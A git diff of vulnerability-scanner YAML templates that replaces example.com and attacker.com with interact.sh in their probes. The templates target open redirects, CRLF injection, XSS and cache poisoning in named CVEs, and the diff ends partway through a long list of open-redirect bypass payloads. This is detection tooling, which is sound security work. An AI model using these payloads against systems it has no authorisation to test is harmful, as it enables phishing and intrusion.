- - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
- - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
- - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
- - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
- - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
+ - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
+ - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
+ - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
+ - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
+ - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
+ - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
stop-at-first-match: true
redirects: true
@@ -37,5 +37,5 @@ requests:
- 200
- type: word
words:
- - "Example Domain"
+ - " Interactsh Server
"
part: body
diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml
index e40368cb13..31f45a6ce6 100644
--- a/cves/2021/CVE-2021-24210.yaml
+++ b/cves/2021/CVE-2021-24210.yaml
@@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
+ - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml
index 03abba0392..353e46f133 100644
--- a/cves/2021/CVE-2021-24288.yaml
+++ b/cves/2021/CVE-2021-24288.yaml
@@ -18,10 +18,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
+ - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml
index b495d73948..b14b8c85ef 100644
--- a/cves/2021/CVE-2021-24358.yaml
+++ b/cves/2021/CVE-2021-24358.yaml
@@ -23,7 +23,7 @@ requests:
Host: {{Hostname}}
- |
- GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
+ GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
Host: {{Hostname}}
redirects: true
@@ -31,7 +31,7 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors:
- type: regex
diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml
index 3eab806058..e9962f0eb1 100644
--- a/cves/2021/CVE-2021-24406.yaml
+++ b/cves/2021/CVE-2021-24406.yaml
@@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
+ - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-24838.yaml b/cves/2021/CVE-2021-24838.yaml
index 4507004f34..d5a8994f81 100644
--- a/cves/2021/CVE-2021-24838.yaml
+++ b/cves/2021/CVE-2021-24838.yaml
@@ -19,14 +19,14 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
+ - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
diff --git a/cves/2021/CVE-2021-25028.yaml b/cves/2021/CVE-2021-25028.yaml
index 95166d2193..276b76a71b 100644
--- a/cves/2021/CVE-2021-25028.yaml
+++ b/cves/2021/CVE-2021-25028.yaml
@@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
+ - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml
index eb2253c0ed..83c815b2b8 100644
--- a/cves/2021/CVE-2021-25033.yaml
+++ b/cves/2021/CVE-2021-25033.yaml
@@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
+ - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-25074.yaml b/cves/2021/CVE-2021-25074.yaml
index 4d0bc14d27..3ae03aa67d 100644
--- a/cves/2021/CVE-2021-25074.yaml
+++ b/cves/2021/CVE-2021-25074.yaml
@@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
+ - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/21
diff --git a/cves/2021/CVE-2021-25111.yaml b/cves/2021/CVE-2021-25111.yaml
index 7c8f439e97..506e3d7994 100644
--- a/cves/2021/CVE-2021-25111.yaml
+++ b/cves/2021/CVE-2021-25111.yaml
@@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com"
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml
index 7f46e618ad..639239fcce 100644
--- a/cves/2021/CVE-2021-27132.yaml
+++ b/cves/2021/CVE-2021-27132.yaml
@@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
+ - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
@@ -32,7 +32,7 @@ requests:
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- - "Location: example.com"
+ - "Location: interact.sh"
- "X-XSS-Protection:0"
part: header
condition: and
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
index 1fb8c47b82..f854a1c72a 100644
--- a/cves/2021/CVE-2021-27905.yaml
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -27,7 +27,7 @@ requests:
Connection: close
- |
- GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
+ GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml
index 9ce1f43762..144d5434a0 100644
--- a/cves/2021/CVE-2021-29622.yaml
+++ b/cves/2021/CVE-2021-29622.yaml
@@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/new/newhttp://example.com"
+ - "{{BaseURL}}/new/newhttp://interact.sh"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2021/CVE-2021-32618.yaml b/cves/2021/CVE-2021-32618.yaml
index 87f4c0da7f..9516d961a3 100644
--- a/cves/2021/CVE-2021-32618.yaml
+++ b/cves/2021/CVE-2021-32618.yaml
@@ -6,7 +6,7 @@ info:
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
- will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
+ will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@@ -21,10 +21,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/login?next=\\\example.com'
+ - '{{BaseURL}}/login?next=\\\interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index bceb482946..5f9932809c 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -20,7 +20,7 @@ info:
requests:
- raw:
- |+
- GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+ GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}}
Connection: close
@@ -34,6 +34,6 @@ requests:
- type: word
words:
- - "com\"/onmouseover=\"alert(1)\">"
+ - "sh\"/onmouseover=\"alert(1)\">"
# Enhanced by mp on 2022/04/21
diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml
index e5f0e1ba3d..b315539242 100644
--- a/cves/2021/CVE-2021-34370.yaml
+++ b/cves/2021/CVE-2021-34370.yaml
@@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
+ - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml
index 1cf1c27f69..7e6130d9e5 100644
--- a/cves/2021/CVE-2021-34621.yaml
+++ b/cves/2021/CVE-2021-34621.yaml
@@ -34,11 +34,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_email"
- {{randstr}}@example.com
+ {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password"
- {{randstr}}@example.com
+ {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password_present"
@@ -46,11 +46,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_first_name"
- {{randstr}}@example.com
+ {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_last_name"
- {{randstr}}@example.com
+ {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="_wp_http_referer"
@@ -89,7 +89,7 @@ requests:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
- log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
+ log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
- |
GET /wp-admin/ HTTP/1.1
diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml
index 50332c40c1..8d04d97361 100644
--- a/cves/2021/CVE-2021-3654.yaml
+++ b/cves/2021/CVE-2021-3654.yaml
@@ -21,13 +21,13 @@ requests:
- method: GET
path:
- - '{{BaseURL}}//example.com/%2f..'
+ - '{{BaseURL}}//interact.sh/%2f..'
matchers-condition: and
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status
diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml
index 4708455ae9..748fc229c4 100644
--- a/cves/2021/CVE-2021-39501.yaml
+++ b/cves/2021/CVE-2021-39501.yaml
@@ -20,12 +20,12 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com'
+ - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by mp on 2022/03/16
diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml
index 4e82f41a4d..4ab7d97069 100644
--- a/cves/2021/CVE-2021-41826.yaml
+++ b/cves/2021/CVE-2021-41826.yaml
@@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/auth/logout?continue=//example.com"
+ - "{{BaseURL}}/auth/logout?continue=//interact.sh"
matchers-condition: and
matchers:
@@ -33,6 +33,6 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/27
diff --git a/cves/2021/CVE-2021-44528.yaml b/cves/2021/CVE-2021-44528.yaml
index 266195bfe7..f2bb4ca0e0 100644
--- a/cves/2021/CVE-2021-44528.yaml
+++ b/cves/2021/CVE-2021-44528.yaml
@@ -21,14 +21,14 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- X-Forwarded-Host: //example.com
+ X-Forwarded-Host: //interact.sh
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
- type: status
status:
diff --git a/cves/2021/CVE-2021-45092.yaml b/cves/2021/CVE-2021-45092.yaml
index 60a13263b4..66949d3421 100644
--- a/cves/2021/CVE-2021-45092.yaml
+++ b/cves/2021/CVE-2021-45092.yaml
@@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/lab.html?vpath=//example.com"
+ - "{{BaseURL}}/lab.html?vpath=//interact.sh"
matchers:
- type: regex
diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml
index d27fe97f68..a64ce02434 100644
--- a/cves/2021/CVE-2021-46379.yaml
+++ b/cves/2021/CVE-2021-46379.yaml
@@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
+ - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2022/CVE-2022-0165.yaml b/cves/2022/CVE-2022-0165.yaml
index 6819d8dae4..fedf338005 100644
--- a/cves/2022/CVE-2022-0165.yaml
+++ b/cves/2022/CVE-2022-0165.yaml
@@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com"
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
\ No newline at end of file
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index 47e1e5d356..15717f78c2 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/index.php/example.com'
+ - '{{BaseURL}}/index.php/interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08
diff --git a/misconfiguration/caddy-open-redirect.yaml b/misconfiguration/caddy-open-redirect.yaml
index 4e43996064..40f51f9b7c 100644
--- a/misconfiguration/caddy-open-redirect.yaml
+++ b/misconfiguration/caddy-open-redirect.yaml
@@ -11,10 +11,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}//example.com/%2F..'
+ - '{{BaseURL}}//interact.sh/%2F..'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
diff --git a/token-spray/api-debounce.yaml b/token-spray/api-debounce.yaml
index 2ed95d091b..2c1aef9552 100644
--- a/token-spray/api-debounce.yaml
+++ b/token-spray/api-debounce.yaml
@@ -13,7 +13,7 @@ self-contained: true
requests:
- method: GET
path:
- - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
+ - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
matchers:
- type: word
diff --git a/token-spray/api-fullhunt.yaml b/token-spray/api-fullhunt.yaml
index dd160e504b..f69fd590db 100644
--- a/token-spray/api-fullhunt.yaml
+++ b/token-spray/api-fullhunt.yaml
@@ -15,7 +15,7 @@ self-contained: true
requests:
- method: GET
path:
- - https://fullhunt.io/api/v1/domain/example.com/details
+ - https://fullhunt.io/api/v1/domain/interact.sh/details
headers:
X-API-Key: "{{token}}"
diff --git a/token-spray/api-sslmate.yaml b/token-spray/api-sslmate.yaml
index 940d325e12..4454c7c339 100644
--- a/token-spray/api-sslmate.yaml
+++ b/token-spray/api-sslmate.yaml
@@ -14,7 +14,7 @@ self-contained: true
requests:
- method: GET
path:
- - https://sslmate.com/api/v2/certs/example.com?expand=current.crt
+ - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
headers:
Authorization: Bearer {{token}}
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 1703f38d93..88f4e1af9f 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -13,9 +13,9 @@ requests:
- raw:
- |
GET /?{{randstr}}=9 HTTP/1.1
- X-Forwarded-Prefix: prefix.cache.example.com
- X-Forwarded-Host: host.cache.example.com
- X-Forwarded-For: for.cache.example.com
+ X-Forwarded-Prefix: prefix.cache.interact.sh
+ X-Forwarded-Host: host.cache.interact.sh
+ X-Forwarded-For: for.cache.interact.sh
- |
GET /?{{randstr}}=9 HTTP/1.1
@@ -24,10 +24,10 @@ requests:
matchers:
- type: dsl
dsl:
- - 'contains(body_2, "cache.example.com")'
+ - 'contains(body_2, "cache.interact.sh")'
extractors:
- type: regex
part: response
regex:
- - "(prefix|host|for).cache.example.com"
+ - "(prefix|host|for).cache.interact.sh"
diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml
index 2598c937eb..7e6cd07c7e 100644
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@@ -15,94 +15,94 @@ requests:
payloads:
redirect:
- - '%0a/example.com/'
- - '%0d/example.com/'
- - '%00/example.com/'
- - '%09/example.com/'
- - '%5C%5Cexample.com/%252e%252e%252f'
- - '%5Cexample.com'
- - '%5cexample.com/%2f%2e%2e'
- - '%5c{{RootURL}}example.com/%2f%2e%2e'
- - '../example.com'
- - '.example.com'
- - '/%5cexample.com'
- - '////\;@example.com'
- - '////example.com'
- - '///example.com'
- - '///example.com/%2f%2e%2e'
- - '///example.com@//'
- - '///{{RootURL}}example.com/%2f%2e%2e'
- - '//;@example.com'
- - '//\/example.com/'
- - '//\@example.com'
- - '//\example.com'
- - '//\texample.com/'
- - '//example.com/%2F..'
- - '//example.com//'
- - '//example.com@//'
- - '//example.com\texample.com/'
- - '//https://example.com@//'
- - '/<>//example.com'
- - '/\/\/example.com/'
- - '/\/example.com'
- - '/\example.com'
- - '/example.com'
- - '/example.com/%2F..'
- - '/example.com/'
- - '/example.com/..;/css'
- - '/https:example.com'
- - '/{{RootURL}}example.com/'
- - '/〱example.com'
- - '/〵example.com'
- - '/ゝexample.com'
- - '/ーexample.com'
- - '/ーexample.com'
- - '<>//example.com'
- - '@example.com'
- - '@https://example.com'
- - '\/\/example.com/'
- - 'example%E3%80%82com'
- - 'example.com'
- - 'example.com/'
- - 'example.com//'
- - 'example.com;@'
- - 'https%3a%2f%2fexample.com%2f'
- - 'https:%0a%0dexample.com'
- - 'https://%0a%0dexample.com'
- - 'https://%09/example.com'
- - 'https://%2f%2f.example.com/'
- - 'https://%3F.example.com/'
- - 'https://%5c%5c.example.com/'
- - 'https://%5cexample.com@'
- - 'https://%23.example.com/'
- - 'https://.example.com'
- - 'https://////example.com'
- - 'https:///example.com'
- - 'https:///example.com/%2e%2e'
- - 'https:///example.com/%2f%2e%2e'
- - 'https:///example.com@example.com/%2e%2e'
- - 'https:///example.com@example.com/%2f%2e%2e'
- - 'https://:80#@example.com/'
- - 'https://:80?@example.com/'
- - 'https://:@\@example.com'
- - 'https://:@example.com\@example.com'
- - 'https://:@example.com\@WillBeReplaced.com'
- - 'https://;@example.com'
- - 'https://\texample.com/'
- - 'https://example.com/example.com'
- - 'https://example.com/https://example.com/'
- - 'https://www.\.example.com'
- - 'https:/\/\example.com'
- - 'https:/\example.com'
- - 'https:/example.com'
- - 'https:example.com'
- - '{{RootURL}}example.com'
- - '〱example.com'
- - '〵example.com'
- - 'ゝexample.com'
- - 'ーexample.com'
- - 'ーexample.com'
- - '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=ex